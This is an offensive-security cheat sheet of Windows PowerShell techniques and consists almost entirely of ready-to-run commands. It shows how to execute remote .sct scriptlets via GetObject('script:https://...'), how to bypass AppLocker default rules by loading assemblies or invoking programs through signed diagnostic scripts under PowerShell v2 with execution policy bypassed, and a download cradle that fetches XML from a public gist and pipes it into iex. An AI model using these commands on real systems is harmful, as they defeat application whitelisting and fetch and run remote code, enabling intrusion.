### SCT VBScript/JScript Execution
### [
[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0)
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
[name.space]::executesomething()

### Command Invocation w/ PowerShell Diagnostic Scripts
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module CL_Invocation.ps1
SyncInvoke notepad.exe

### PowerShell v5+ Download Cradle
### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d]
### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239]
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex